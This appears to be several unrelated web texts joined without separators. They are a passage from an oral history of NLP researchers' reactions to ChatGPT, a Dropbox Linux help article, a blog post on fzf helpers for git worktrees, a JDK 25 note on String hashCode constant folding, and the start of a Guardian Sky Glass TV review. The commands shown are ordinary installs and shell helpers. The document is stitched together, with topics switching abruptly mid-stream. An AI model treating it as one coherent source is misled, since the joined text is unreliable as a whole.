The industry community that was doing a lot of this early work around scaling had never been that closely engaged with academic NLP. They were seen as outsiders. That led to a divergence in understanding and what people thought was happening between these two [groups], because they weren’t talking to each other that much.
LIAM DUGAN:
They gave a large part of the survey out at ACL [Association for Computational Linguistics, the field’s top conference] that year. This was the first conference I’d ever been to, and it was very exciting for me because there’s all these people that are really smart. So I get the survey, and I’m reading it on my phone, and I’m just like, “They sound like nutcases.”
JULIAN MICHAEL:
It was already a field in crisis. The survey just gave us a stronger sense.
LIAM DUGAN:
You got to see the breakdown of the whole field — the sides coalescing. The linguistic side was not very trusting of raw LLM technology. There’s a side that’s sort of in the middle. And then there’s a completely crazy side that really believed that scaling was going to get us to general intelligence.
At the time, I just brushed them off. And then ChatGPT comes out.
* * *
II. Chicxulub (November 2022 through 2023)
ChatGPT • rude awakenings • “drowned out in noise”
IZ BELTAGY (lead research scientist, Allen Institute for AI; chief scientist and co-founder, SpiffyAI):
In a day, a lot of the problems that a large percentage of researchers were working on — they just disappeared.
CHRISTOPHER CALLISON-BURCH:
I didn’t predict it. I don’t think anyone did. But I was prepared for it because I had gone through that experience with GPT-3 earlier.
R. THOMAS MCCOY:
It’s reasonably common for a specific research project to get scooped or be eliminated by someone else’s similar thing. But ChatGPT did that to entire types of research, not just specific projects. A lot of higher categories of NLP just became no longer interesting — or no longer practical — for academics to do.
SAM BOWMAN:
It felt like the field completely reoriented.
IZ BELTAGY:
I sensed that dread and confusion during EMNLP [Empirical Methods in Natural Language Processing], which is one of the leading conferences. It happened in December, a week after the release of ChatGPT. Everybody was still shocked: “Is this going to be the last NLP conference?” This is actually a literal phrase that someone said. During lunches and cocktails and conversations in the halls, everybody was asking the same question: “What is there that we can work on?”
NAZNEEN RAJANI:
I had just given a keynote at EMNLP. A few days after that, Thom Wolf, who was my manager at Hugging Face and also one of the co-founders, messages me, “Hey, can you get on a call with me ASAP?” He told me that they had fired people from the research team and that the rest would either be doing pre-training or post-training — which means that you are either building a foundation model or you’re taking a foundation model and making it an instruction-following model, similar to ChatGPT. And he said, “I recommend you pick one of these two if you want to continue at Hugging Face.”
It didn’t feel like what the Hugging Face culture stood for. Until then, everyone was basically just doing their own research, what they wanted to do. It definitely felt not so good.
Rude awakenings also came from the bottom up — as one eminent NLP expert found out firsthand while teaching her undergraduate course in the weeks after ChatGPT’s release.
CHRISTIANE FELLBAUM (lecturer with the rank of professor of linguistics and computer science, Princeton University):
We had just started our semester. Just before class, a student whom I didn’t know yet came up to me, showed me a paper with my name and title on it and said: “I really want to be in your class — I’ve researched your work and I have found this paper from you, but I have a few questions about it. Could you answer them?”
And I said, “Well, sure.” I was flattered: He’s researching me, how nice. So I leafed through the paper. And while I was trying to refresh my memory, he broke out in hysterical laughter. I said, “What’s funny?” And he said: “This paper was written by ChatGPT. I said, ‘Write me a paper in the style of Christiane Fellbaum,’ and this is what came out.”
Now, I didn’t read every line, because I had to start class in 10 minutes. But everything looked like what I would write. He totally fooled me. And I went into class and thought, “What am I going to do?”
Over the next year, doctoral students faced their new reality, too. ChatGPT threatened their research projects and possibly their careers. Some coped better than others.
CHRISTOPHER CALLISON-BURCH:
It helps to have tenure when something like this happens. But younger people were going through this crisis in a more visceral way. Some Ph.D. students literally formed support groups for each other.
LIAM DUGAN:
We just kind of commiserated. A lot of Ph.D. students that were further on than me, that had started dissertation work, really had to pivot hard. A lot of these research directions, it’s like there’s nothing intellectual about them left. It’s just, apply the language model and it’s done.
Weirdly enough, nobody [I knew] quit. But there was a bit of quiet quitting. Just kind of dragging your feet or getting very cynical.
RAY MOONEY:
One of my own [graduate students] thought about dropping out. They thought that maybe the real action was happening in industry and not in academia. And I thought, you know, maybe they weren’t wrong about that. But I’m glad they decided to stay in.
JULIE KALLINI:
Starting my Ph.D. in 2023, it was an uncertain place to be. I was really unsure about where my direction would end up, but everyone was in the same boat. I think I just came to deal with it. I tried to make sure that I know my machine learning fundamentals well. It’s not the wisest thing to only specialize in potentially fleeting trends in large language models.
Meanwhile, NLP researchers from Seattle to South Africa faced a firehose of global attention, not all of it good.
VUKOSI MARIVATE (ABSA UP chair of data science, University of Pretoria; co-founder, Masakhane):
I don’t know how many tutorials I gave on LLMs in 2023. On one hand, you’ve been trying to talk to people for years and say, “There’s interesting stuff that’s happening here.” Then all of a sudden, it’s just a complete waterfall of, “Come explain this to us.”
SAM BOWMAN:
It goes from a relatively sleepy field to, suddenly, I’m having lunch with people who were meeting with the Pope and the President in the same month.
EMILY M. BENDER:
Between January and June, I counted five workdays with no media contact. It was nonstop.
ELLIE PAVLICK:
Before ChatGPT, I don’t think I ever talked to a journalist. Maybe once or twice. After ChatGPT, I was on 60 Minutes. It was a huge qualitative difference in the nature of the work.
CHRISTOPHER CALLISON-BURCH:
I felt like my job went from being an academic with a narrow audience of graduate students and other researchers in my field to being like, “Hey, there’s an important responsibility for scientific communication here.” I got invited to testify before Congress.
LIAM DUGAN:
As a second-year Ph.D. student, I was suddenly being asked for my opinion in interviews. At the time, it felt very cool, like, “I’m such an expert in this!” Then it felt less exciting and more sort of overwhelming: “Where do you see this going in the future?” I don’t know. Why are you asking me?
Of course, I would answer confidently. But it’s crazy: There’s thousands of papers. Everyone has their hot take on what’s going on. And most of them have no idea what they’re talking about.
SAM BOWMAN:
There was this flowering of great engagement: Suddenly a lot of really amazing people from a lot of fields were looking at this stuff. And it was also getting drowned out in noise: everyone talking about this stuff all the time, lots and lots of really dashed-off takes that didn’t make any sense. It was great, and it was unfortunate.
NAZNEEN RAJANI:
That year was kind of a roller coaster.
In December 2023, one year after ChatGPT’s release, the annual EMNLP conference convened again in Singapore.
LIAM DUGAN:
The temperature was just so much higher, and the flood of arxiv [preprint] results was just so intense. You would walk the halls: All the way down, it was just prompting and evaluation of language models.
And it felt very different. At the very least, it felt like there were more people there than good research ideas. It had stopped feeling like NLP, and more like AI.
* * *
III. Mutatis Mutandis (2024–25)
LLM-ology • money • becoming AI
For NLP, the LLM-generated writing was on the wall — and it said different things to different people in the field.
R. THOMAS MCCOY:
Anytime you’re doing work that asks about the abilities of an AI system, you ought to be looking at systems for which we have access to the training data. But that’s not at all the prevalent approach in the field. In that sense, we’ve become more “LLM-ologists” than scientists.
ELLIE PAVLICK:
I am 100% guilty of this. I often say this when I give talks: “Right now, we are studying language models.” I get how myopic that seems. But you have to see this really long-game research agenda where it fits. In my mind, there’s not a path forward to understanding language that doesn’t have an account of “What are LLMs doing?”
KALIKA BALI:
Every time there’s been a technological disruption that mainly comes from the West, there’s always been these — if you may call it — philosophical concerns. Whereas in most of the Global South, we’ve kind of gone with, “How do we make it work for us here and now?”
Here’s a tiny example. In India, the initial idea that everyone gathered around [after ChatGPT came out] was to have generative language models do their work in English and then put a translation system in front of it to output into whatever language you wanted. But machine translation systems are literal. So if you have a math problem that says, “John and Mary have a key lime pie to divide,” and you translate it into Hindi, I can bet you most people in India do not know what a key lime pie is. How would you translate that into something culturally specific, unless the model itself is made to understand things? I became much more interested in how to solve that.
IZ BELTAGY:
There is a point where you realize that in order to continue advancing the field, you need to build these huge, expensive artifacts. Like the Large Hadron Collider — you can’t advance experimental physics without something like this.
I was lucky to be at Ai2, which generally has more resources than most academic labs. ChatGPT made it clear that there’s a huge gap between OpenAI and everybody else. So right after, we started thinking about ways we can build these things from scratch. And this is exactly what happened.
In 2024, Ai2’s OLMo provided a fully open-source alternative to the increasingly crowded field of industry-developed language models. Meanwhile, some researchers who had continued to study these proprietary systems — which only grew in scale, capability and opaqueness in the post-ChatGPT AI boom — were already encountering a new kind of resistance.
YEJIN CHOI:
I had this paper [in late 2023] demonstrating how the latest GPT models, which were seemingly good at doing multiplication, suddenly get very bad at it when you use three- or four-digit numbers. The reactions to this were super-divisive. People who don’t do empirical research at all were saying, “Did you do your experiments correctly?” That had never happened before. They were emotional reactions. I really like these people, so I was not put off by them or anything. I was just surprised by how powerful this thing is. It was almost as if I’d hurt their baby. It was eye-opening.
Ungrounded hype isn’t helpful in science. I felt it was important to study the fundamental limits and capabilities of LLMs more rigorously, and that was my primary research focus in 2024. I found myself in a weird situation where I was becoming the negative naysayer for how the models cannot do this and that. Which I think is important — but I didn’t want it to be all that I do. So I’m actually thinking a lot about different problems these days.
TAL LINZEN:
It’s sometimes confusing when we pretend that there’s a scientific conversation happening, but some of the people in the conversation have a stake in a company that’s potentially worth $50 billion.
The explosion of research momentum, money and hype vaporized the already-porous boundaries between NLP and AI. Researchers contended with a new set of incentives and opportunities — not just for themselves, but for the field itself.
NAZNEEN RAJANI:
It opened doors that wouldn’t have otherwise. I was one of the first people to get the data to reproduce ChatGPT in open-source — I basically wrote the recipe book for it, which is amazing. And that led me to get a good seed round for my startup.
R. THOMAS MCCOY:
Any faculty member who is AI-adjacent starts to be viewed as an AI person — you sort of get typecast to play that role. I’m happy to work on AI because it’s one of the most impactful things that I can be doing with my skillset. But the thing that would bring me the greatest joy is diving deeply into interesting corners of grammar and human cognition. Which is something that can be linked back to advancing AI, but that pathway is pretty long.
JULIE KALLINI:
It’s all a matter of semantics, right? Personally, I see myself as working across NLP, computational linguistics and AI at the same time. I do think there are different communities for each field, but there are plenty of people who bridge several areas.
JULIAN MICHAEL:
If NLP doesn’t adapt, it’ll become irrelevant. And I think to some extent that’s happened. That’s hard for me to say. I’m an AI alignment researcher now.
ANNA ROGERS:
I’m not concerned. Basically that’s because I don’t think we’ve actually solved the problem. The only reason to get upset is if you think: “This is it. Language is done.” And I don’t think that’s true.
CHRISTOPHER POTTS:
This should be an incredible moment for linguistics and NLP. I mean, the stakes are very high. Maybe it’s one of those moments of a field waking up and realizing that it now has incredible influence. You can’t pretend like you’re a quiet scientific or engineering field anymore that just does research for the sake of research — because now all the money in the world is behind you, and every big corporation is trying to exert influence on what you do, and language models are being deployed all over the place.
If you achieve so much, you also have to accept that the debates are going to be heated. How else could it be?
* * *
Epilogue: Were Large Language Models a Paradigm Shift?
Not surprisingly, opinions differ.
TAL LINZEN:
If you asked me five, seven, 10 years ago, I would never have thought that just typing an instruction into a language model would get it to complete the sentence in a way that is consistent with what you’re asking it to do. I don’t think anyone would have thought that that would be the paradigm these days. We have this one interface that basically lets us do everything.
ANNA ROGERS:
As a linguist, I wouldn’t say so. Back from the word-embedding days [in 2013], the whole premise was transfer learning — you learn something from a large amount of textual data in the hope that this will help you with something else. There have been shifts in popularity, in architectures, in how the public feels about this — but not in this underlying principle.
JEFF MITCHELL:
I feel like the corporate interests have changed the way the game is played.
ELLIE PAVLICK:
I think the media involvement makes a difference. Scientists in my field realized that success could look like becoming known outside of NLP, and suddenly the audience changed. Papers on arxiv.org are often titled to be picked up by journalists or Silicon Valley enthusiasts, not by professors. That’s a huge change.
VUKOSI MARIVATE:
I think in some ways the barrier to entry both got reduced and heightened. The reduced part is that there’s still a lot that we just don’t understand about what’s actually going on in these systems, so there’s a lot of work that’s just prodding them as much as possible. In that case, you don’t need to know the architecture of a neural network like the back of your hand.
At the same time, the barrier was heightened because in order to play with and prod those architectures, you have to be in a very high-resource space, computationally speaking.
EMILY M. BENDER:
I have seen an enormous shift towards end-to-end solutions using chatbots or related synthetic text-extruding machines. And I believe it to be a dead end.
CHRISTIANE FELLBAUM:
The big shift, or shock I would even say, is that these large language models are getting so powerful that we have to ask, “Where does the human fit in?” That’s a paradigm shift: a shift in technology, how these models are trained and how well they can learn. And then of course the educational consequences, like in my class. Those are the things that keep me awake at night.
R. THOMAS MCCOY:
In linguistics, there are all these questions that historically have been largely philosophical debates that suddenly are empirically testable. That’s definitely been one big paradigm shift. But from a certain point of view, the way the field looked like 10 years ago was: people creating some data set, throwing a neural network at the data set, and seeing what happened. And that version of the field still exists, just with much larger data sets and much larger neural networks.
CHRISTOPHER POTTS:
Maybe this is the way it always works, but the hallmark of a paradigm shift is that questions we used to think were important now no longer get asked. It feels like that has happened over the past five years. I used to focus a lot on sentiment classification, like, “Give me a sentence and I’ll tell you if it was expressing a positive or negative emotion.” Now the entire field is focused on natural language generation — all those questions that we used to think were central have become peripheral compared to that.
I suppose these are famous last words. Maybe in 2030, we’ll look back and think this was nothing compared to what happened in 2029.
All conversations have been edited for length and clarity.
Dropbox will require App Indicator support on Linux
The information in this article applies to Dropbox customers on the Linux operating system.
Important note: The Dropbox desktop app for Linux is changing. To continue enjoying the full desktop experience on Linux, you may need to update your system or download additional libraries.
With the Dropbox desktop app for Linux, you can save, view, share, and access files and folders stored in your Dropbox account from your computer.
To get the full Dropbox desktop experience on Linux, including the Dropbox icon in the system tray, you’ll need to meet additional requirements and you may need to install additional libraries.
Supported Linux distributions
To get the full desktop app experience on Linux, you’ll need one of the following:
Ubuntu 64-bit: 18.04 or later
Fedora 64-bit: 28 or later
Note: The Dropbox desktop app isn’t officially supported on other Linux distributions, but it may work if they meet the necessary Dropbox system requirements for Linux.
Supported desktop environments
The Dropbox tray icon needs a desktop environment that supports AppIndicator, which desktop apps use to display icons in the system tray. Not all desktop environments support AppIndicator natively.
To determine your desktop environment:
Open your Terminal application.
Copy and paste the following command into Terminal, then press Enter:
echo $XDG_CURRENT_DESKTOP
The terminal will display the name of your current desktop environment.
The following desktop environments generally support AppIndicator:
Unity
KDE Plasma
The following desktop environments need additional libraries or extensions to support AppIndicator:
XFCE supports AppIndicators via xfce4-indicator-plugin, which may be preinstalled in your distribution.
MATE has native indicator support, especially in Ubuntu MATE. For Linux Mint (MATE), you’ll need to install the Ayatana Indicators.
Notes:
Other desktop environments like LXDE don’t support AppIndicator natively or through extensions, and can’t be supported. You’ll need a different desktop environment to get the full Dropbox desktop app experience.
Linux distributions can vary.
To install Ayatana Indicators for Linux Mint (MATE)
To install Ayatana Indicators:
Open your Terminal application.
Copy and paste the following command into Terminal, then press Enter:
sudo apt install ayatana-indicator-application
Restart your machine.
Right-click on the MATE panel, then click Add to Panel.
Enter Indicator Applet Complete in the box beside Find an item to add to the panel.
Select Indicator Applet Complete when it appears, then click Add.
The Dropbox icon should now appear in the added applet.
Required software libraries
You’ll also need all of the following software libraries to run the app:
GTK 2.24 or later
Glib 2.40 or later
Libappindicator 12.10 or later
To install LibAppIndicator on Linux
Dropbox uses an external library called LibAppIndicator to interact with AppIndicator. For the full Dropbox experience, you’ll need to install this library:
Fedora
Open your Terminal application.
Copy and paste the following command into Terminal, then press Enter:
sudo dnf install libappindicator-gtk3
Debian or Ubuntu
Open your Terminal application.
Copy and paste the following command into Terminal, then press Enter:
sudo apt install libappindicator3-1
FAQs
Why has my Dropbox app for Linux stopped working?
The Dropbox app for Linux was recently updated. As a result, some Linux users need to meet additional requirements or download additional libraries to continue using the app in the same way as before. If you’re having issues, check you’re running the latest version of the app, review the requirements in this article, then update your computer if necessary.
Can I run the Dropbox app for Linux if I don’t meet all of the requirements?
If your device doesn’t meet the operating system requirements, you may still be able to use the Dropbox desktop application, but results may vary.
The Dropbox app can also run in headless mode, once you meet the essential system requirements. This runs without a graphical user interface. You can install the app, then control Dropbox using the Linux Command Line Interface (CLI).
What Linux commands are available on Dropbox?
The Dropbox desktop app can be controlled with the Linux Command Line Interface (CLI). Before running commands, make sure your prompt is located at the root (top level) of the Dropbox folder. Learn more about available Linux commands on Dropbox.
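For example, a few commonly available commands look like this (a sketch, not an exhaustive list; the exact set of commands depends on the version of the Dropbox CLI installed on your system):
cd ~/Dropbox        # run commands from the root (top level) of the Dropbox folder
dropbox status      # show the current sync status
dropbox start       # start the Dropbox daemon
dropbox stop        # stop the Dropbox daemon
dropbox filestatus  # show the sync status of individual files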
Git worktrees are great, but they fall behind the venerable git checkout sometimes. I attempted to fix that with fzf and a bit of bash.
Fear not if you haven’t heard of “worktrees”, I have included a primer here.
Why Worktrees?
Picture this. You are whacking away on a feature branch. Halfway there, in fact. Your friend asks you to fix something urgently. You proceed to do one of three things:
create a temporary branch, make a WIP commit, begin working on the fix
stash away your changes, begin working on the fix
unfriend said friend for disturbing your flow
All of these options are … subpar. With the temporary branch, you are forced to create a partial, non-working commit, and then reset said commit once done with the fix. With the stash approach, you are required to now keep a mental model of the stash, be aware of untracked files that don’t get stashed by default, etc. Why won’t git just let you work on two things at the same time without thinking so much?
That is exactly what worktrees let you do. Worktrees let you have
more than one checkout at a time, each checkout in a separate directory.
Like creating a new clone, but safer (it disallows checking out the same
branch twice) and a lot more space efficient (the new working tree is
“linked” to the “main” worktree, and a good amount of stuff is shared).
When your friend asks you to make the fix, you proceed like so:
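# leave the half-done feature branch exactly as it is, and add a
# second checkout for the urgent fix (path and branch name are
# illustrative)
λ git worktree add ../urgent-fix
λ cd ../urgent-fix
# make the fix, commit, push ...
λ cd -   # back to the feature branch, right where you left it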
Easy as cake. You didn’t have to settle for a partially working commit, you didn’t have to deal with this “stash” thing, and you didn’t have to unfriend your friend. Treating each branch as a directory just feels more intuitive, more UNIX-y.
A few weeks later, you find yourself singing in praise of worktrees,
working on several things simultaneously. And at the same time, cursing
them for being a little … clunky.
What makes them clunky?
Worktrees are great at what they claim to do. They stay out of the way when you need a checkout posthaste. However, as you start using them regularly, you realize they are not as flexible as git checkout or git switch.
Branch-hopping
You can git checkout <branch> from anywhere within a git repository. You can’t “jump” to a worktree in the same fashion. The closest you can get is to run git worktree list, copy the path corresponding to your branch, and cd into it.
# keeping these paths in your head is hard
λ git worktree list
~/worktrees/rustc/master                 eac6c33bc63 [master]
~/worktrees/rustc/improve-std-char-docs  94cba88553e [improve-std-char-docs]
~/worktrees/rustc/is-ascii-octdigit      bc57be3af7a [feature/is-ascii-octdigit]
~/my/other/path/oh/god                   op57or3ns7n [fix/some-error]
λ cd ~/worktrees/rustc/is-ascii-octdigit
Branch-previewing
You can “preview” branches with git branch -v. However, to get an idea of what “recent activity” on a worktree looks like, you might need some juggling. You can’t glean much info about a worktree in a jiffy.
Branch-previewing with the good ol’ git-branch:
λ git branch -v
+ feature/is-ascii-octdigit bc57be3af7a introduce {char, u8}::is_ ...
+ improve-std-char-docs     94cba88553e add whitespace in assert ...
* master                    eac6c33bc63 Auto merge of #100869 - n ...
Meanwhile in worktree wonderland:
λ git worktree list
~/worktrees/rustc/master eac6c33bc63 [master]
~/worktrees/rustc/improve-std-char-docs 94cba88553e [improve-std-char-docs]
~/worktrees/rustc/is-ascii-octdigit bc57be3af7a [feature/is-ascii-octdigit]
# aha, so ../is-ascii-octdigit corresponds to `feature/is-ascii-octdigit`
λ git log feature/is-ascii-octdigit
bc57be3af7a introduce {char, u8}::is_ascii_octdigit
eac6c33bc63 Auto merge of #100869 - nnethercote:repl ...
b32223fec10 Auto merge of #100707 - dzvon:fix-typo, ...
aa857eb953e Auto merge of #100537 - petrochenkov:pic ...
# extra work to make the branch <-> worktree correspondence
Shell completions
Lastly, you can bank on shell completions to fill in your branch whilst using git checkout. Worktrees have no such conveniences.
We can mend these minor faults with fzf.
Unclunkifying worktrees
I’d suggest looking up fzf (or skim or fzy). These things make it cake-easy to add interactivity to your shell. Onto fixing the first minor fault, the inability to “jump” to a worktree from anywhere within a git repository.
I have a little function called gwj which stands for “git worktree jump”. The idea is to list all the worktrees, select one with fzf, and cd to it upon selection:
gwj () {
    local out
    out=$(git worktree list | fzf | awk '{print $1}')
    cd "$out"
}
That is all of it really. Head into a git repository:
# here, "master" is a directory, which contains my main
# worktree: a checkout of the master branch on rust-lang/rust
λ cd ~/worktrees/rustc/master/library/core/src
λ # hack away
Run gwj, pick a worktree, and hit enter. You should find yourself in the selected worktree.
Onward, to the next fault, lack of preview-ability. We can utilize fzf’s aptly named --preview flag, to, well, preview our worktree before performing a selection:
gwj () {
    local out
    out=$(git worktree list | fzf --preview='git log --oneline -n10 {2}' | awk '{print $1}')
    cd "$out"
}
Once again, hit gwj inside a git repository with linked worktrees:
λ gwj
╭─────────────────────────────────────────────────────────╮
│ eac6c33bc63 Auto merge of 100869 nnethercote:replace... │
│ b32223fec10 Auto merge of 100707 dzvon:fix-typo, r=d... │
│ aa857eb953e Auto merge of 100537 petrochenkov:picche... │
│ 3892b7074da Auto merge of 100210 mystor:proc_macro_d... │
│ db00199d999 Auto merge of 101249 matthiaskrgr:rollup... │
│ 14d216d33ba Rollup merge of 101240 JohnTitor:JohnTit... │
│ 3da66f03531 Rollup merge of 101236 thomcc:winfs-noze... │
│ 0620f6e90af Rollup merge of 101230 davidtwco:transla... │
│ c30c42ee299 Rollup merge of 101229 mgeisler:link-try... │
│ e5356712b9e Rollup merge of 101165 ldm0:drain_to_ite... │
╰─────────────────────────────────────────────────────────╯
>
  4/4
> /home/np/worktrees/compiler/master                eac6c...
  /home/np/worktrees/compiler/improve-std-char-docs 94cba...
  /home/np/worktrees/compiler/is-ascii-octdigit     bc57b...
A fancy preview of the last 10 commits on the branch that the selected worktree corresponds to. In other words, a sight for sore eyes.
Our little script is already shaping up to be useful: you hit gwj, browse through your worktrees, preview each one and automatically cd to your selection. But we are not done yet.
The last fault was the lack of shell completions. A quick review of what a shell completion really does:
Each time you hit “tab”, the shell produces a few “completion
candidates”, and once you have just a single candidate left, the shell
inserts that for you directly into your edit line. Of course, this
process varies from shell to shell.
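(As an aside: if you also want real tab completion for gwj itself, a minimal bash sketch, assuming bash’s programmable completion and not taken from this post, could look like the following.)
# rudimentary bash completion for gwj, offering worktree
# paths as completion candidates (illustrative sketch)
_gwj() {
    local cur=${COMP_WORDS[COMP_CWORD]}
    COMPREPLY=( $(compgen -W "$(git worktree list 2>/dev/null | awk '{print $1}')" -- "$cur") )
}
complete -F _gwj gwj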
fzf narrows down your options as you type into the prompt, but you still have to:
Type gwj
Hit enter
Type out a query and narrow down your search
Hit enter
We can speed that up a bit, have fzf narrow down the candidates on
startup, just like our shell does:
gwj () {
    local out query
    query="${1:-}"
    out=$(git worktree list | fzf --preview='git log --oneline -n10 {2}' --query "$query" -1 | awk '{print $1}')
    cd "$out"
}
The change is extremely tiny, blink-and-you’ll-miss-it kinda tiny. We added a little --query flag, which allows you to prefill the prompt, and the -1 flag, which avoids the interactive finder if only one match exists on startup:
# skip through the fzf prompt:
λ gwj master
# cd -- ~/worktrees/rustc/master

# more than one option, we end up in the interactive finder
λ gwj improve
╭─────────────────────────────────────────────────────────╮
│ eac6c33bc63 Auto merge of 100869 nnethercote:replace... │
│ b32223fec10 Auto merge of 100707 dzvon:fix-typo, r=d... │
│ aa857eb953e Auto merge of 100537 petrochenkov:picche... │
╰─────────────────────────────────────────────────────────╯
> improve
  2/2
> /home/np/worktrees/compiler/improve-const-perf    eac6c...
  /home/np/worktrees/compiler/improve-std-char-docs 94cba...
Throw some error handling in there, hook up a similar script to improve the UX of git worktree remove, go wild. A few more helpers I’ve got:
# gwa /path/to/branch-name
# creates a new branch and "switches" to it
function gwa () {
    git worktree add "$1" && cd "$1"
}
alias gwls="git worktree list"
In JDK 25, we improved the performance of the class String in such a way that the String::hashCode function is mostly constant foldable. For example, if you use Strings as keys in a static unmodifiable Map, you will likely see significant performance improvements.
Example
Here is a relatively advanced example where we maintain an immutable Map of native calls; its keys are the names of the method calls, and the values are MethodHandles that can be used to invoke the associated system call:
// Set up an immutable Map of system calls
static final Map<String, MethodHandle> SYSTEM_CALLS = Map.of(
        "malloc", linker.downcallHandle(mallocSymbol, …),
        "free", linker.downcallHandle(freeSymbol, …),
        ...);
…
// Allocate a memory region of 16 bytes
long address = (long) SYSTEM_CALLS.get("malloc").invokeExact(16L);
…
// Free the memory region
SYSTEM_CALLS.get("free").invokeExact(address);
The method linker.downcallHandle(…) takes a symbol and additional parameters to bind a native call to a Java MethodHandle via the Foreign Function & Memory API introduced in JDK 22. This is a relatively slow process and involves spinning bytecode. However, once entered into the Map, the new performance improvements in the String class alone allow constant folding of both the key lookups and the values, thus improving performance by a factor of more than 8x.
Note: the benchmarks above are not using a malloc() MethodHandle but an int identity function. After all, we are not testing the performance of malloc() but the actual String lookup and MethodHandle performance.
This improvement will benefit any immutable Map<String, V> with Strings as keys and where values (of arbitrary type V) are looked up via constant Strings.
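For instance, here is a much simpler, hypothetical case that fits the same pattern (the map and method below are illustrative, not from the JDK):
// a static, unmodifiable Map with String keys
static final Map<String, Integer> ERROR_CODES =
        Map.of("not_found", 404, "server_error", 500);

static int notFound() {
    // constant String key + static final immutable Map:
    // the whole lookup can now constant-fold down to 404
    return ERROR_CODES.get("not_found");
}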
How Does It Work?
When a String is first created, its hashcode is unknown. On the first call to String::hashCode, the actual hashcode is computed and stored in a private field String.hash. This might sound odd; if String is immutable, how can it mutate its state? The answer is that the mutation cannot be observed from the outside; String would functionally behave the same regardless of whether or not an internal String.hash cache field is used. The only difference is that it becomes faster for subsequent calls.
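The caching idiom itself is easy to sketch. Here is a simplified illustration (not the actual JDK source; class and field names are made up):
// simplified sketch of String's lazy hash caching
final class CachedHash {
    private final byte[] value;
    private int hash; // 0 means "not computed yet"

    CachedHash(byte[] value) { this.value = value; }

    @Override
    public int hashCode() {
        int h = hash;
        if (h == 0) {
            for (byte b : value) h = 31 * h + b;
            hash = h; // benign race: every thread computes the same value
        }
        return h;
    }
}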
Now that we know how String::hashCode works, we can unveil the performance change made (which consists of a single line of code): the internal field String.hash is marked with the JDK-internal @Stable annotation. That’s it! @Stable tells the virtual machine it can read the field once and, if it is no longer its default value (zero), it can trust the field to never change again. Hence, it can constant-fold the String::hashCode operation and replace the call with the known hash. As it turns out, the fields in the immutable Map and the internals of the MethodHandle are also trusted in the same way. This means the virtual machine can constant-fold the entire chain of operations:
Computing the hash code of the String “malloc” (which is always -1081483544)
Probing the immutable Map (i.e., computing the internal array index, which is always the same for the malloc hashcode)
Retrieving the associated MethodHandle (which always resides at said computed index)
Resolving the actual native call (which is always the native malloc() call)
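(The first claim is easy to check yourself, for example in jshell:)
System.out.println("malloc".hashCode()); // prints -1081483544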
In effect, this means the native malloc() method call can be invoked directly, which explains the tremendous performance improvements. To put it in other words, the chain of operations is completely short-circuited.
What Are the Ifs and Buts?
There is an unfortunate corner case that the new improvement does not cover: if the hash code of the String happens to be zero, constant folding will not work. As we learned above, constant folding can only take place for non-default values (i.e., non-zero values for int fields). However, we anticipate we will be able to fix this small impediment in the near future. You might think only one in about 4 billion distinct Strings has a hash code of zero, and that might be right in the average case. However, one of the most common strings (the empty string “”) has a hash value of zero. On the other hand, no string of 1 to 6 characters (inclusive, with all characters ranging from ` ` (space) to Z) has a hash code of zero.
A Final Note
As the @Stable annotation is applicable only to internal JDK code, you cannot use it directly in your Java applications. However, we are working on a new JEP called JEP 502: Stable Values (Preview) that will provide constructs that allow user code to indirectly benefit from @Stable fields in a similar way.
What’s the Next Step?
You can download JDK 25 already today and see how much this performance improvement will benefit your current applications.
Sky Glass gen 2 review: the smart streaming TV levels up
Guardian
www.theguardian.com
2025-05-01 07:00:16
Latest satellite-free Sky TV is ready for primetime with better picture, sound and much-improved service The latest version of Sky’s Glass smart TV is faster and looks better than its predecessor and offers a level of all-in-one convenience that makes the satellite-free pay TV one of the best on the...
The latest version of Sky’s Glass smart TV is faster and looks better than its predecessor and offers a level of all-in-one convenience that makes the satellite-free pay TV one of the best on the market.
Sky Glass gen 2 is a straight replacement for the original model from 2021, which introduced Sky’s TV-over-broadband service that ditched the need for a satellite dish. The new TV comes in three sizes and you can buy the smallest 43in version for a one-off payment of £699 or £14 a month spread over four years, after which you own it.
It requires a Sky subscription for full use, costing from £15 a month for the Sky Essential TV pack. You wouldn’t buy a Glass without the intention of using Sky, but should you want to ditch the subscription at a later date it will function as a basic smart TV with access to streaming apps such as BBC iPlayer, plus a basic aerial and multiple HDMI inputs.
The gen 2 is available in a choice of three colours and comes with a colour-matched remote.
Photograph: Sky UK
From the front, the gen 2 model looks very similar to the original. It has the same monolithic design with an aluminium body, slim bezels, a soundbar hidden behind a colour-matched mesh at the bottom and voice control mics that respond to “Hello Sky”. Glass gen 2 is thinner and lighter than the outgoing model, though still heavy for a modern TV, weighing 14.7kg for the 43in version with the stand. The larger and heavier 55in and 65in models will require two people to safely manoeuvre them.
A redesigned stand makes it a lot easier to set up, even at the 65in size as tested, with the TV simply slotting on to two prongs for a very stable mount without screws or tools required. It needs a power cable and wifi or Ethernet for internet. A wall bracket can be bought separately.
The TV is voice- and motion-activated, turning on and off when it detects presence, and displaying full-screen recommendations for the latest shows and films.
Photograph: Samuel Gibbs/The Guardian
The crisp 4K LCD screen is noticeably brighter than its predecessor, with deeper blacks and much-reduced halo or blooming effect, which is the unwanted glow around the edges of bright spots such as white text on a black background. The screen has automatic brightness adjustment, which made things look a little too dark and grey in all but the brightest of rooms. Turning it off improved things.
Sky has automatic picture optimisation modes that detect the content being watched, such as entertainment, sport and movies, plus manual vivid and extra vivid modes for those who like over-the-top colours. I found the entertainment mode made the picture too warm, with people looking a little orange, while sport was a bit grey for all but the brightest of match days.
I preferred the movie setting, which is much more balanced, but there is also a custom mode for those who want to fully personalise the picture.
The improved screen really comes to life with HDR films, shows and sport. The Premier League looks crisp and vibrant on Sky and TNT, while flicks such as Furiosa: A Mad Max Saga in Dolby Vision look particularly good. But the screen is not ideal for gaming with an Xbox or PS5, lacking the variable refresh rates of up to 120Hz that console gaming greatly benefits from.
Big sound and great vocals
The speakers fire out from the grille at the top of the TV and fabric strip below the screen.
Photograph: Samuel Gibbs/The Guardian
A big advantage of the Glass over normal TVs is the integrated seven-speaker soundbar, which blows other TV speakers away for power and clarity. Vocals are particularly clear at almost any volume and with none of the lip-sync issues that can plague external soundbars. Without a separate subwoofer or rear speakers, it does an admirable job of producing big and full sound.
However, it struggles to produce really deep, booming bass, and while it has a nice wide sound, there isn’t much in the way of virtual surround effect. Both require a more complex system to achieve with more speakers.
The TV also has night sound, speech enhancement and bass boost modes, the first of which proved very useful to avoid waking the rest of the house for late-night movies, by dampening loud noises while keeping the dialogue intelligible.
Much-improved Sky over broadband
You need a minimum of 25Mbps for HD or 30Mbps for UHD broadcast, but don’t have to have Sky’s broadband for it to work.
